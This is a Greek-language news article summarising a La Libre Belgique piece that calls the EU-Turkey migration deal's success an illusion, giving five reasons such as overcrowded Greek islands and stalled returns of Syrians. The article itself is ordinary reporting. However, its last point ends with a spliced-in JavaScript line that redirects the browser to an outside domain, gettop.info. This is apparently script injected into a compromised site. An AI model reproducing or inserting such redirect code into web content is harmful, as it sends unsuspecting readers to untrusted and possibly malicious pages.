Βελγικά ΜΜΕ: «Οφθαλμαπάτη» η επιτυχία της συμφωνίας ΕΕ-Τουρκίας

0
4

 

Υπό τον τίτλο «Οφθαλμαπάτη η επιτυχία της συμφωνίας ΕΕ-Τουρκίας» και με αφορμή ένα σεμινάριο που διοργανώθηκε από την Ευρωπαϊκή Επιτροπή στην Αθήνα, στα τέλη Οκτωβρίου, η βελγική εφημερίδα La Libre Belgique σημειώνει ότι, παρά τους σχετικούς επαίνους που ακούστηκαν από πλευράς των Ευρωπαίων αξιωματούχων για την υποτιθέμενη επιτυχία της συμφωνίας ΕΕ-Τουρκίας για το μεταναστευτικό, η οποία είχε ως αποτέλεσμα τη δραστική μείωση των ροών και τη δημιουργία της αίσθησης ότι η Ευρώπη ανέκτησε τον έλεγχο των συνόρων της, η πραγματικότητα είναι πολύ διαφορετική.

Συγκεκριμένα, η εφημερίδα αναλύει πέντε βασικούς λόγους, οι οποίοι θέτουν υπό αμφισβήτηση την υποτιθέμενη επιτυχία της εν λόγω συμφωνίας:

α) Τα ελληνικά νησιά βρίσκονται στα πρόθυρα έκρηξης, εξαιτίας της υπερσυγκέντρωσης μεταναστών, το πλήθος των οποίων υπερβαίνει τις θέσεις υποδοχής. Τα υπόλοιπα κράτη-μέλη, ωστόσο, εμφανίζονται απρόθυμα να φιλοξενήσουν κάποιους από αυτούς τους πρόσφυγες στην επικράτειά τους, από φόβο μήπως μία τέτοια κίνηση λειτουργήσει ενθαρρυντικά για μελλοντικούς επίδοξους μετανάστες.

β) Το σύστημα, σύμφωνα με το οποίο για τον κάθε Σύρο που θα επέστρεφε στην Τουρκία ένας άλλος Σύρος θα επανεγκαθίστατο στην Ευρώπη, βρίσκεται εκτός λειτουργίας, κυρίως λόγω της άρνησης των ανεξάρτητων επιτροπών εφέσεων να επιτρέψουν την επιστροφή των Σύρων στην Τουρκία, μη θεωρώντας την τελευταία ασφαλή τρίτη χώρα, γεγονός που δεν άργησε να οδηγήσει στο να γίνουν συστάσεις προς την Αθήνα και να πραγματοποιηθούν αλλαγές στη σύσταση των εν λόγω επιτροπών, θέμα για το οποίο, ωστόσο, εκκρεμεί απόφαση του Συμβουλίου της Επικρατείας.

γ) Οι αιτήσεις χορήγησης ασύλου των Ιρακινών και των Αφγανών βρίσκονται διαρκώς σε εκκρεμότητα, με συνέπεια αυτοί να παραμένουν εγκλωβισμένοι επί μήνες στην Ελλάδα, παρά το ότι και αυτοί, όπως και οι Σύροι, φεύγουν από τις πατρίδες τους εξαιτίας του πολέμου.

δ) Οι μετανάστες βρίσκουν άλλες διόδους για να εισέλθουν στην ΕΕ.

ε) Η συμφωνία με την Τουρκία κρέμεται σε μία κλωστή, δεδομένων των τουρκικών απειλών για ακύρωσή της σε περίπτωση μη απελευθέρωσης των θεωρήσεων εισόδου για τους Τούρκους υπηκόους. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here